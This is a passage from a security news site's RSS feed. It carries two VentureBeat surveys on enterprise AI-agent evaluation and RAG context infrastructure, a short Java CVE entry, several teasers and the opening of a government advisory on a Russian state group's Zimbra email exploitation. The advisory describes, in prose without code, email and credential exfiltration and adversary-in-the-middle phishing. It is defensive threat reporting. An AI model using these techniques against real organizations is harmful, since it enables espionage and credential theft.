Counting the ad-hoc reviewers and the don't-knows, roughly three-quarters of organizations run no automated, real-time evaluation of output correctness in production — they can see that the system is up and what it costs, and they are taking the correctness of its answers on faith. That blind spot is the runtime counterpart to the pre-deployment gap in Finding 1: the same organizations engineering the human out of the deployment decision mostly cannot see, in real time, when the deployed agent starts getting things wrong.</p><h2>Finding 6: Bought on cost, measured on consistency</h2><p><b>Price and integration drive selection; evaluation consistency is the goal</b></p><p>We asked what most influenced enterprises’ choice of an evaluation vendor, and what they treat as their primary measure of success. Both answers are pragmatic.</p><div></div><p>Enterprises buy evaluation tooling on economics and trust it on repeatability. Cost of evaluations (28%) narrowly leads selection, just ahead of ease of integration (27%) and evaluation accuracy (24%) — breadth of observability (13%) and vendor roadmap (4%) matter far less. On what success looks like, more than a third (36%) name evaluation consistency — getting the same verdict on the same behavior every time — well ahead of speed of experimentation (19%), reduction in failures (18%), production visibility (13%), and compliance (11%). The emphasis on consistency is telling: before enterprises can trust an evaluation’s verdict, they need it to be stable — the very property whose absence (bias and inconsistency) ranked among the top trust limitations in Finding 2. Satisfaction with current tooling is only moderate, averaging 3.8 on a five-point scale across overall satisfaction, ease of implementation, and value for money.</p><h2>Finding 7: The next dollar goes to humans and observability</h2><p><b>Investment is flowing to oversight, not just automation</b></p><p>We asked which reliability and evaluation investment will grow most over the next year. The money is going toward watching agents more closely — including with people.</p><div></div><p>The second-largest planned investment — behind only production observability — is human review workflows, at 26%. Read against Finding 1, that is the report's quietest contradiction: at the same moment two-thirds of enterprises are engineering the human out of the deployment decision, more of them plan to grow spending on human reviewers (26%) than on the automated evaluation pipelines (16%) that would replace them. The zero-human trajectory and the human-review budget are rising in the same companies at the same time. Indeed, only 8% report that their budget is not increasing. </p><p>Taken together, enterprises are hedging: building toward autonomy while spending to watch agents more closely and keep humans available for the calls that automated evaluation cannot yet be trusted to make.</p><h2>Finding 8: A tooling reshuffle is coming</h2><p><b>Nearly two-thirds plan to adopt or switch platforms within a year</b></p><p>We asked whether enterprises plan to adopt a new, additional, or replacement evaluation platform, and which they are considering. Few intend to stand pat.</p><div></div><p>The evaluation market is wide open. While 36% have no plans to change, a clear majority (64%) intend to adopt a new, additional, or replacement platform within twelve months, and 31% within the next quarter. The consideration set points where current usage is thinnest: Confident AI’s DeepEval leads what enterprises are evaluating (20%), ahead of OpenAI’s native evals (13%) and Braintrust (9%) — the open-source specialists drawing more interest than their present footprint. </p><p>Given that so many enterprises today rely on provider-native tools or nothing at all (Finding 4), this is less a defection than a first real wave of tooling adoption — the moment the evaluation layer starts to consolidate. Which platforms earn that trust, in a market where almost no one trusts automated evaluation yet, is the open question this series will keep tracking.</p><h2>The bottom line: An evaluation gap that autonomy will widen, not close</h2><p>Organizations with 100 or more employees are granting AI agents more independence than they trust their evaluations to support. Half have already shipped an agent that passed its evals and then failed a customer; almost none fully trust automated evaluation, chiefly because it doesn’t match real-world outcomes; and most watch production for uptime and cost rather than for whether the agent’s answers are right. Yet two-thirds already allow, or are actively building toward, deploying to production on automated evaluation alone.</p><p>The vendor market is early and unsettled: the most common primary evaluation tools are provider-native evals, tied with no dedicated tooling at all, and a clear majority plan to adopt or switch platforms within the year. Encouragingly, the next dollar is going to observability and — pointedly — human review, suggesting enterprises sense the gap even as they engineer past it. At 157 respondents in a single wave this is a directional read, skewed toward the mid-market — but the direction is clear: autonomy is being granted on the strength of evaluations that the people granting it do not yet trust. The evaluation gap is not a coverage problem that more tests alone will close; it is a problem of evaluations that reflect reality and can be trusted to gate it. The open question for later waves is whether assurance catches up to autonomy — or whether the false-confidence failures move from customer incidents into changes that deploy themselves.</p><hr><p><i>Based on survey responses from 157 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. This is a directional read rather than a precise measurement — the sample is self-selected, not a probability sample, and skews toward the mid-market. Respondents include product and program managers, consultants and advisors, directors of engineering/IT, and CIOs/CTOs/CISOs, among other functions, across technology/software, retail/consumer, healthcare/life sciences, manufacturing, and other industries.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI context gap: Enterprise AI organizations have a trust problem, not a retrieval problem — and most are still building the fix]]></title>
<description><![CDATA[Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define...]]></description>
<link>https://tsecurity.de/de/3689828/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689828/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define the category — yet a majority of enterprises have already watched their agents produce confident, wrong answers traced to missing or inconsistent context. A governed semantic layer is emerging as the fix, but most are still building it; the field is converging on hybrid retrieval; and even as provider-native tools lead in practice, a plurality say they intend to keep best-of-breed. The result is a context gap — agents that sound authoritative running on a foundation their owners do not yet fully trust.</p><p>This wave of VentureBeat Pulse Research examines the enterprise RAG and context layer: what feeds AI agents their business context, which retrieval systems enterprises run, how they buy and measure them, where the architecture is heading, and — most revealingly — how often that context is already failing them.</p><p>The central finding is a context gap — the distance between how confidently enterprise agents answer and how reliable the context beneath them actually is. A majority of enterprises (57%) report that in the past six months their AI agents produced confident but wrong answers they traced to missing or inconsistent business context, and more than half of those said it happened more than once. This is not a fringe failure: retrieval is the primary context source for 38% of enterprises, more than any other approach, so when retrieval is thin or inconsistent, the errors it produces are wearing the agent’s authority. The infrastructure to fix it is being built — 58% already run or are building a governed semantic layer — but for most it is not yet in production.</p><p>Underneath, the market is consolidating in a direction that surprises. Provider-native retrieval — OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) — already leads every dedicated vector database, and enterprises expect hybrid retrieval to dominate by the end of 2026 (34%). Yet a plurality (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack, and a majority (57%) plan to switch or add a provider within the year. Stated preference and actual usage are pulling in opposite directions — the market is buying provider-native while insisting it wants independence.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series. This survey focused on enterprise RAG infrastructure and the context layer — the retrieval systems, semantic layers, and context sources that feed AI agents. Responses are filtered to organizations with more than 100 employees (n=101); the survey drew no responses from organizations of 100 or fewer, so the full sample qualifies. All responses are from a single Q2 2026 (June) wave, so the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By organization size the sample concentrates in the mid-market: 251–1,000 employees (31%) and 101–250 (31%) lead, with 1,001–5,000 (20%), 5,001–10,000 (12%), and 10,001+ (7%) above them. By role it spans managers (39%), individual contributors (27%), the C-suite (16%), and VPs and directors (14%); on purchasing authority it is buyer-credible, with 46% final decision-makers and another 26% recommenders or influencers. Technology/Software is the largest industry at 20%, followed by Healthcare/Life Sciences (11%) and a broad spread across retail, transportation, financial services, manufacturing, and education.</p><p>At 101 respondents this is a modest sample and should be read as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It is best read as the view from organizations actively standing up RAG and context infrastructure rather than from the largest operators.</p><h2>Finding 1: Confident and wrong</h2><p><b>More than half have traced agent errors to bad context</b></p><p>We asked whether, in the past six months, enterprises had traced a confident but wrong agent answer to missing or inconsistent business context. Most had.</p><div></div><p>This is the report’s defining number. A majority of enterprises (57%) have already had an AI agent produce a confident, wrong answer they traced to bad context — wrong metrics, stale definitions, or missing documents — and more than half of those have seen it happen more than once. Only 28% report no such failure, and a small remainder either don’t run agents on enterprise data or don’t trace root cause closely enough to know. </p><p>The failure mode is specific and dangerous: the model is not obviously hallucinating; it is confidently wrong because the context feeding it was thin or inconsistent. Everything else in this report — what enterprises retrieve, how they govern it, and what they plan to build — is downstream of this problem.</p><h2>Finding 2: RAG is the default context source</h2><p><b>Retrieval feeds more agents than any other method</b></p><p>We asked what an enterprise’s AI agents primarily use to understand its data. Retrieval leads by a wide margin.</p><div></div><p>Retrieval is the backbone of enterprise context. For 38% of organizations, RAG over documents or a vector index is the primary way agents understand the business — nearly twice the share of the next approach, a governed semantic layer or ontology (21%). Mixed approaches (14%), direct live-system queries (10%), and long-context loading (6%) fill out the rest, and only 2% let agents run on the model’s general knowledge alone. The concentration matters in light of Finding 1: because so much enterprise context flows through retrieval, the quality of that retrieval is the quality of the answer. When RAG is the default source, thin retrieval is not an edge case — it is the main failure surface.</p><p>One approach is notable for its absence from these answers: customizing model weights, also known as fine-tuning. Every leading source of business context is injected at run time. Our most recent direct measurement of fine-tuning comes from our April–May survey wave (a separate survey, n=136), where fine-tuning capabilities ranked last of six factors in model selection at 5% — even as 26% of that sample still named fine-tuning and customization an investment they expect to grow. Fine-tuning has fallen out of the primary selection conversation; context injection is how enterprises make agents knowledgeable about their business.</p><h2>Finding 3: Provider-native retrieval already leads the vector databases</h2><p><b>OpenAI file search and vertex AI search top the dedicated tools</b></p><p>We asked which retrieval systems enterprises run in production today. The answer favors the model providers and hyperscalers over the specialists.</p><div></div><p>The dedicated vector database is no longer the center of the RAG stack. OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) lead — provider-native and hyperscaler-native retrieval — ahead of every purpose-built vector database. Among the specialists, the most-used is the one enterprises already run for other reasons (Elasticsearch/OpenSearch, 20%) and the open, embedded option (pgvector, 12%); the pure-play vector databases that define the category — Weaviate, Qdrant, Pinecone, Milvus — each sit in single digits to low double digits. Notably, 13% of enterprises say they still run no production RAG at all. As with the platforms in the parallel infrastructure wave, enterprises are gravitating to retrieval that comes bundled with tools they already buy.</p><p>The shape of this finding held across both Q2 waves. In April–May (n=161), provider-built retrieval led usage there too, while every dedicated vector database remained marginal — the most-used standalone vector database peaked at 8% of that sample — and the hybrid, pluralistic future was already the consensus expectation (34% expected hybrid retrieval to dominate, with another 29% expecting multiple architectures by use case). Two waves, consistent picture: the category that coined the “vector database” term is being collected by the platforms enterprises already buy from.</p><h2>Finding 4: But they say they want to keep best-of-breed</h2><p><b>A plurality resist consolidating onto a provider’s native stack</b></p><p>We asked how enterprises will respond as model providers bundle retrieval, memory, and orchestration into their platforms. Their stated intent cuts against their current usage.</p><div></div><p>Here is the tension at the heart of the stack. Even as provider-native retrieval leads in practice (Finding 3), a plurality of enterprises (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack — well ahead of the 21% who plan to consolidate. Another 21% expect a mix, and 9% intend to build and own the layer themselves. The gap between what enterprises run and what they say they want is the strategic question of the category: they are adopting bundled retrieval for convenience while asserting they will preserve independence. Which impulse wins — the pull of the provider bundle or the stated preference for modular control — will shape the retrieval market more than any single tool.</p><h2>Finding 5: Hybrid retrieval is the consensus bet</h2><p><b>Vector-only retrieval is already seen as insufficient</b></p><p>We asked which retrieval architecture enterprises expect to dominate their production RAG systems by the end of 2026. The field is converging — with a large share still unsure.</p><div></div><p>The architecture is settling on hybrid. A third (34%) expect hybrid retrieval — embeddings combined with reranking and access controls — to dominate their production systems by the end of 2026, three times the 11% who expect vector-only retrieval to prevail. That is a notable signal: the pure vector-search approach that launched the category is already viewed as insufficient on its own, superseded by pipelines that add reranking for accuracy and access controls for governance — the very access controls whose absence produces the failures in Finding 1. Tellingly, the second-largest answer is uncertainty: 17% simply don’t know, and another 14% expect to move beyond a dedicated vector layer entirely toward tool-first or long-context retrieval. The consensus is not a single tool but a layered pipeline — and it is not yet fully formed.</p><h2>Finding 6: The governed context layer is being built now</h2><p><b>Most run or are building a semantic layer — few in production</b></p><p>We asked whether enterprises use a governed semantic or context layer to give agents and BI a shared understanding of their data. Most are on the path; fewer have arrived.</p><div></div><p>The fix for the context gap is under construction. Well over half of enterprises (58%) either run a governed semantic layer in production (25%) or are piloting and building one (34%), and a further 17% are actively evaluating — meaning three-quarters are engaged with the idea in some form. But the balance is telling: more are building than have shipped, so for most enterprises the shared, governed definition layer that would prevent the "confident but wrong" failures of Finding 1 is still a work in progress. The semantic layer is the industry’s answer to inconsistent context; this wave catches it mid-construction, ambition well ahead of production.</p><h2>Finding 7: Bought on ingestion and simplicity, watched for correctness</h2><p><b>Selection favors operability; monitoring favors correctness and security</b></p><p>We asked what matters most when enterprises choose a retrieval system, and what they track once it is running. Both answers lean practical.</p><div></div><p>Enterprises choose retrieval systems on operability. Ease of data ingestion (36%), latency and performance (32%), and operational simplicity (29%) lead the selection criteria — ahead of retrieval accuracy and access control (23% each), the two factors most directly tied to the failures in Finding 1. Once systems are running, the emphasis shifts toward trust: the most-tracked metrics are response correctness (42%) and security and access control (38%), ahead of latency (28%), operational stability (27%), and answer relevance (23%). </p><p>Satisfaction with current systems is moderately positive but not enthusiastic — on a five-point scale, overall satisfaction averages 4.0, with ease of implementation and value for money both near 3.9. Enterprises buy for how easily a system runs and watch it for whether it can be trusted.</p><h2>Finding 8: A retrieval reshuffle is coming</h2><p><b>A majority plan to change providers — and the vector specialists are gaining interest</b></p><p>We asked whether enterprises plan to change or add a retrieval provider, and which they are considering. The consideration set differs from today’s stack.</p><div></div><p>The retrieval stack is not settled. While 43% have no plans to change, a small majority (57%) intend to switch or add a provider within twelve months, and a quarter (26%) within the next quarter. The consideration set is where it gets interesting: provider-native retrieval still leads what enterprises are evaluating (OpenAI 22%, Vertex AI Search 21%), but the open-source vector specialists punch above their current footprint — Qdrant (14%) and Milvus (13%) draw more switching interest than their present usage (10% and 6%) would suggest. Read with Finding 4, the picture is a market in flux: enterprises run provider-native today, are evaluating a broader field, and say they want to keep their options open. The reshuffle ahead will test whether best-of-breed intent survives contact with the convenience of the bundle.</p><h1>The bottom line: A context gap that more retrieval alone won’t close</h1><p>Organizations with more than 100 employees are wiring agents into their business faster than they can guarantee the context those agents run on. Retrieval is the default source of enterprise context, and it increasingly comes from the model providers and hyperscalers rather than the dedicated vector databases — yet a majority of enterprises have already watched agents answer confidently and wrongly because that context was thin or inconsistent. The failure is not exotic; it is the predictable result of pointing authoritative-sounding agents at an unreliable foundation.</p><p>The industry’s answer — a governed semantic layer, hybrid retrieval with reranking and access controls — is being built but is mostly not yet in production, and enterprises are pulled between the convenience of provider-native bundles and a stated preference for best-of-breed independence. At 101 respondents in a single Q2 wave this is a directional read, skewed toward the mid-market — but the direction is clear: the context layer is the next contested tier of the AI stack, and right now agents are running ahead of it. The context gap is not a retrieval-volume problem that more documents or bigger indexes will solve on their own; it is a problem of governed, consistent, access-aware context. The open question for later waves is whether enterprises finish building that layer before the confident-but-wrong failures move from the lab into decisions that matter.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single Q2 2026 (June) wave. At this sample size the results should be read as a directional signal rather than a precise measurement — it's a self-selected sample, not a probability sample, and skews toward the mid-market. Respondents include managers, individual contributors, VPs/directors, and the C-suite, with strong purchasing authority, across technology, healthcare, retail, transportation, financial services, manufacturing, and education.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47057 | Oracle Java SE Scripting privileges management (Nessus ID 329174)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Oracle Java SE. The affected element is an unknown function of the component Scripting. Performing a manipulation results in improper privilege management.

This vulnerability was named CVE-2026-47057. The attack may be initi...]]></description>
<link>https://tsecurity.de/de/3689729/sicherheitsluecken/cve-2026-47057-oracle-java-se-scripting-privileges-management-nessus-id-329174/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689729/sicherheitsluecken/cve-2026-47057-oracle-java-se-scripting-privileges-management-nessus-id-329174/</guid>
<pubDate>Thu, 23 Jul 2026 18:46:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE</a>. The affected element is an unknown function of the component <em>Scripting</em>. Performing a manipulation results in improper privilege management.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-47057">CVE-2026-47057</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[How Elasticsearch ES|QL COMPLETION turns noisy curl and wget rules into high-fidelity cloud security alerts]]></title>
<description><![CDATA[Elastic InfoSec tested this detection rule pattern on their own cloud fleet, filtering noisy curl and wget events with deterministic logic and LLM triage so only genuine threats reach an analyst.]]></description>
<link>https://tsecurity.de/de/3689601/it-security-nachrichten/how-elasticsearch-esql-completion-turns-noisy-curl-and-wget-rules-into-high-fidelity-cloud-security-alerts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689601/it-security-nachrichten/how-elasticsearch-esql-completion-turns-noisy-curl-and-wget-rules-into-high-fidelity-cloud-security-alerts/</guid>
<pubDate>Thu, 23 Jul 2026 18:00:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elastic InfoSec tested this detection rule pattern on their own cloud fleet, filtering noisy curl and wget events with deterministic logic and LLM triage so only genuine threats reach an analyst.]]></content:encoded>
</item>
<item>
<title><![CDATA[VPN vs Zero Trust: Which Should Your Organisation Use in 2026?]]></title>
<description><![CDATA[By HOC Team  |  Last updated: July 2026 | Read time: ~20 min In 2013, a contractor named Edward… The post VPN vs Zero Trust: Which Should Your Organisation Use in 2026? appeared first on Hackers Online Club. This article has…
Read more →
The post VPN vs Zero Trust: Which Should Your Organisation ...]]></description>
<link>https://tsecurity.de/de/3689509/it-security-nachrichten/vpn-vs-zero-trust-which-should-your-organisation-use-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689509/it-security-nachrichten/vpn-vs-zero-trust-which-should-your-organisation-use-in-2026/</guid>
<pubDate>Thu, 23 Jul 2026 17:41:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>By HOC Team  |  Last updated: July 2026 | Read time: ~20 min In 2013, a contractor named Edward… The post VPN vs Zero Trust: Which Should Your Organisation Use in 2026? appeared first on Hackers Online Club. This article has…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/vpn-vs-zero-trust-which-should-your-organisation-use-in-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/vpn-vs-zero-trust-which-should-your-organisation-use-in-2026/">VPN vs Zero Trust: Which Should Your Organisation Use in 2026?</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VPN vs Zero Trust: Which Should Your Organisation Use in 2026?]]></title>
<description><![CDATA[By HOC Team  |  Last updated: July 2026 | Read time: ~20 min In 2013, a contractor named Edward…
The post VPN vs Zero Trust: Which Should Your Organisation Use in 2026? appeared first on Hackers Online Club.]]></description>
<link>https://tsecurity.de/de/3689484/it-security-nachrichten/vpn-vs-zero-trust-which-should-your-organisation-use-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689484/it-security-nachrichten/vpn-vs-zero-trust-which-should-your-organisation-use-in-2026/</guid>
<pubDate>Thu, 23 Jul 2026 17:24:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>By HOC Team  |  Last updated: July 2026 | Read time: ~20 min In 2013, a contractor named Edward…</p>
<p>The post <a href="https://hackersonlineclub.com/vpn-vs-zero-trust/">VPN vs Zero Trust: Which Should Your Organisation Use in 2026?</a> appeared first on <a href="https://hackersonlineclub.com/">Hackers Online Club</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Thu, 23 Jul 2026 16:59:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
<p>Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section.</p>
<p>This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Netherlands General Intelligence and Security Service (AIVD)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Defense Counterintelligence and Security Agency (DCSA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Department of the Treasury</li>
<li>United States Naval Criminal Investigative Service (NCIS)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)<a href="https://www.cisa.gov/#f1"><sup>1</sup></a></li>
<li>Danish Defence Intelligence Service (DDIS)<a href="https://www.cisa.gov/#f2"><sup>2</sup></a></li>
<li>Estonian Foreign Intelligence Service (EFIS)<a href="https://www.cisa.gov/#f3"><sup>3</sup></a></li>
<li>Finnish Defence Intelligence (FDI)<a href="https://www.cisa.gov/#f4"><sup>4</sup></a></li>
<li>Finnish Security and Intelligence Service (SUPO)<a href="https://www.cisa.gov/#f5"><sup>5</sup></a></li>
<li>French General Directorate for Internal Security (DGSI)<a href="https://www.cisa.gov/#f6"><sup>6</sup></a></li>
<li>French National Cybersecurity Agency (ANSSI)<a href="https://www.cisa.gov/#f7"><sup>7</sup></a></li>
<li>Italian External Intelligence and Security Agency (AISE)<a href="https://www.cisa.gov/#f8"><sup>8</sup></a></li>
<li>Italian Internal Intelligence and Security Agency (AISI)<a href="https://www.cisa.gov/#f9"><sup>9</sup></a></li>
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM)<a href="https://www.cisa.gov/#f10"><sup>10</sup></a></li>
<li>Polish Foreign Intelligence Agency (AW)<a href="https://www.cisa.gov/#f11"><sup>11</sup></a></li>
<li>The Military Counterintelligence Service of Poland (SKW)<a href="https://www.cisa.gov/#f12"><sup>12</sup></a></li>
<li>Spain National Intelligence Centre (CNI)<a href="https://www.cisa.gov/#f13"><sup>13</sup></a></li>
<li>Sweden National Cyber Security Centre (NCSC-SE)<a href="https://www.cisa.gov/#f14"><sup>14</sup></a></li>
</ul>
<p>The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the <a href="https://www.cisa.gov/#mitigations1">Mitigations</a> section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed <a href="https://www.cisa.gov/#ioc1">Indicators of compromise</a> (IOCs).  </p>
<p>As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.</p>
<p>For a downloadable list of IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml">AA26-204A.stix.xml</a> (STIX XML)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json">AA26-204A.stix.json</a> (STIX JSON)</li>
</ul>
<h2><strong>Cybersecurity industry tracking</strong><a class="ck-anchor"></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:</p>
<ul>
<li>LAUNDRY BEAR</li>
<li>Void Blizzard [<a href="https://www.cisa.gov/#wc2">2</a>]</li>
<li>CL-STA-1114 [<a href="https://www.cisa.gov/#wc3">3</a>]</li>
<li>TA488 (formerly UNK_PitStop) [<a href="https://www.cisa.gov/#wc4">4</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Background</strong></h2>
<p>Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [<a href="https://www.cisa.gov/#wc1">1</a>] [<a href="https://www.cisa.gov/#wc2">2</a>]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.  </p>
<p>The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank">T1114.002</a>]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [<a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank">T1078</a>], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [<a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank">T1557</a>].  </p>
<p>Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank">T1587.001</a>] named “<em>Улей</em>” or “<em>Ulej</em>” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank">T1114</a>]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:</p>
<ul>
<li>Last 90 days of emails,</li>
<li>Email address,</li>
<li>Password [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank">T1589.001</a>],</li>
<li>Global Address List (GAL) [<a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank">T1087</a>],</li>
<li>Two-factor authentication (2FA) tokens, and</li>
